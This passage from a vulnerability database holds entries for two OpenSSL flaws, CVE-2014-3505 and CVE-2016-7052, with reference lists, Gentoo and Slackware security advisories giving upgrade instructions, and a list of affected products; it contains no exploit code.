AMI: ALAS-2014-391", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-391" }, { "title": "Symantec Security Advisories: SA85 : OpenSSL Security Advisory 06-Aug-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=02a206cf2efb06aecdaf29aeca851b55" }, { "title": "oval", "trust": 0.1, "url": "https://github.com/jumanjihouse/oval " }, { "title": "wormhole", "trust": 0.1, "url": "https://github.com/jumanjihouse/wormhole " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3505" }, { "db": "CNNVD", "id": "CNNVD-201408-126" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3505" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2014-1256.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1053.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60687" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60824" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60917" }, { "trust": 1.1, "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-008.txt.asc" }, { "trust": 1.1, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60938" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60921" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-08/msg00036.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1297.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-2998" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140853041709441\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141077370928502\u0026w=2" }, { "trust": 1.1, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61775" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61959" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59756" }, { "trust": 1.1, "url": "http://security.gentoo.org/glsa/glsa-201412-39.xml" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-september/000196.html" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1030693" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69081" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:158" }, { "trust": 1.1, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15573.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61250" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61184" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61100" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61040" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60803" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60778" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60684" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60493" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60022" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59743" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59710" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59700" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58962" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1052.html" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=bff1ce4e6a1c57c3d0a5f9e4f85ba6385fccfe8b" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3505" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3510" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3506" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3507" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/solutions/len-24443" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.4, "url": "https://rhn.redhat.com/errata/rhsa-2014-1052.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3512" }, { "trust": 0.3, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bff1ce4e6a1c57c3d0a5f9e4f85ba6385fccfe8b" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021317" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684444" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684903" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004917" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004931" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686126" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004872" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/84" }, { "trust": 0.3, "url": "aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182969" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04426586" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04404655" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684570" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2deee-50da9c14daae3/cert_mini_security_bulletin_xrx15a_v1-01.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685467" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098196" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182784" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-1054.html" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691014" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691005" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098264" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098585" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686182" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685967" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096510" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15573.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966557" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3505.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3506.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3508.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3510.html" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=bff1ce4e6a1c57c3d0a5f9e4f85ba6385fccfe8b" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35204" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2308-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "http://h71000.www7.hp.com/openvms/products/ssl/ssl.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3509.html" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3507.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3511.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.17" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.5" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2308-1" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=2.1.0" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3505" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3505" }, { "db": "BID", "id": "69081" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-126" }, { "db": "NVD", "id": "CVE-2014-3505" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3505" }, { "db": "BID", "id": "69081" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-126" }, { "db": "NVD", "id": "CVE-2014-3505" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-08-13T00:00:00", "db": "VULMON", "id": "CVE-2014-3505" }, { "date": "2014-08-06T00:00:00", "db": "BID", "id": "69081" }, { "date": "2015-03-18T00:44:34", "db": "PACKETSTORM", "id": "130868" }, { "date": "2014-09-15T17:53:34", "db": "PACKETSTORM", "id": "128248" }, { "date": "2014-08-14T02:24:57", "db": "PACKETSTORM", "id": "127861" }, { "date": "2014-08-08T21:44:17", "db": "PACKETSTORM", "id": "127790" }, { "date": "2014-09-17T20:46:27", "db": "PACKETSTORM", "id": "128297" }, { "date": "2014-08-11T11:11:00", "db": "PACKETSTORM", "id": "127811" }, { "date": "2014-08-06T12:12:12", "db": "PACKETSTORM", "id": "169648" }, { "date": "2014-08-20T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-126" }, { "date": "2014-08-13T23:55:07.343000", "db": "NVD", "id": "CVE-2014-3505" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-01-07T00:00:00", "db": "VULMON", "id": "CVE-2014-3505" }, { "date": "2016-07-26T23:00:00", "db": "BID", "id": "69081" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-126" }, { "date": "2023-11-07T02:20:09.627000", "db": "NVD", "id": "CVE-2014-3505" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127790" }, { "db": "CNNVD", "id": "CNNVD-201408-126" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL DTLS Double release vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201408-126" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "69081" } ], "trust": 0.3 } }
var-201609-0481
Vulnerability from variot
crypto/x509/x509_vfy.c in OpenSSL 1.0.2i allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by triggering a CRL operation. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to crash the affected application, resulting in a denial-of-service condition.
Gentoo Linux Security Advisory GLSA 201612-16
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 07, 2016 Bugs: #581234, #585142, #585276, #591454, #592068, #592074, #592082, #594500, #595186 ID: 201612-16
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which allows attackers to conduct a time based side-channel attack.
Background
OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general purpose cryptography library.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2j >= 1.0.2j
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers and the International Association for Cryptologic Research's (IACR) paper, "Make Sure DSA Signing Exponentiations Really are Constant-Time" for further details. Additionally, a time based side-channel attack may allow a local attacker to recover a private DSA key.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2j"
References
[ 1 ] CVE-2016-2105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105 [ 2 ] CVE-2016-2106 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106 [ 3 ] CVE-2016-2107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107 [ 4 ] CVE-2016-2108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108 [ 5 ] CVE-2016-2109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109 [ 6 ] CVE-2016-2176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176 [ 7 ] CVE-2016-2177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177 [ 8 ] CVE-2016-2178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178 [ 9 ] CVE-2016-2180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180 [ 10 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 11 ] CVE-2016-6304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304 [ 12 ] CVE-2016-6305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305 [ 13 ] CVE-2016-6306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306 [ 14 ] CVE-2016-7052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052 [ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time http://eprint.iacr.org/2016/594.pdf
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-16
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] openssl (SSA:2016-270-01)
New openssl packages are available for Slackware 14.2 and -current to fix a security issue.
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.2j-i586-1_slack14.2.txz: Upgraded. This update fixes a security issue: Missing CRL sanity check (CVE-2016-7052) For more information, see: https://www.openssl.org/news/secadv/20160926.txt https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7052 ( Security fix ) patches/packages/openssl-solibs-1.0.2j-i586-1_slack14.2.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-1.0.2j-i586-1_slack14.2.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-solibs-1.0.2j-i586-1_slack14.2.txz
Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-1.0.2j-x86_64-1_slack14.2.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-solibs-1.0.2j-x86_64-1_slack14.2.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2j-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2j-i586-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2j-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2j-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.2 packages: cf3e90f91b35ee96f5a900e5f2ec8fd5 openssl-1.0.2j-i586-1_slack14.2.txz 31cc46351fdd4c487f75abdbfcd696e7 openssl-solibs-1.0.2j-i586-1_slack14.2.txz
Slackware x86_64 14.2 packages: 333fd278752b5f04a805aeabd77f28c4 openssl-1.0.2j-x86_64-1_slack14.2.txz 6b25daf23b1cfc59351308b9c11e830a openssl-solibs-1.0.2j-x86_64-1_slack14.2.txz
Slackware -current packages: 98337bdfe00f04be784953fee5c023ca a/openssl-solibs-1.0.2j-i586-1.txz 3cd05a7ed655e7f51f652a31b9b908e7 n/openssl-1.0.2j-i586-1.txz
Slackware x86_64 -current packages: 6907d9a091ace959d8f04aa92cd7e5f6 a/openssl-solibs-1.0.2j-x86_64-1.txz 4017d82d5c4c370ab6850a5d623d321a n/openssl-1.0.2j-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.2j-i586-1_slack14.2.txz openssl-solibs-1.0.2j-i586-1_slack14.2.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAlfpZcsACgkQakRjwEAQIjPMMACbB1R3zcPgLf11KPr1jtmRE7PN BvgAnjd81wwT0k1DTOieELSStonzadsk =AuZJ -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201609-0481", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 2.4, "vendor": "openssl", "version": "1.0.2i" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "4.6.0" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "6.7.0" }, { "model": "suse linux enterprise module for web scripting", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "12.0" }, { "model": "node.js", "scope": "lte", "trust": 1.0, "vendor": "nodejs", "version": "4.1.2" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.0.0" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "6.0.0" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.2.0" }, { "model": "linux enterprise module for web scripting", "scope": null, "trust": 0.8, "vendor": "suse", "version": null }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "project openssl 1.0.2i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "15.1" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" 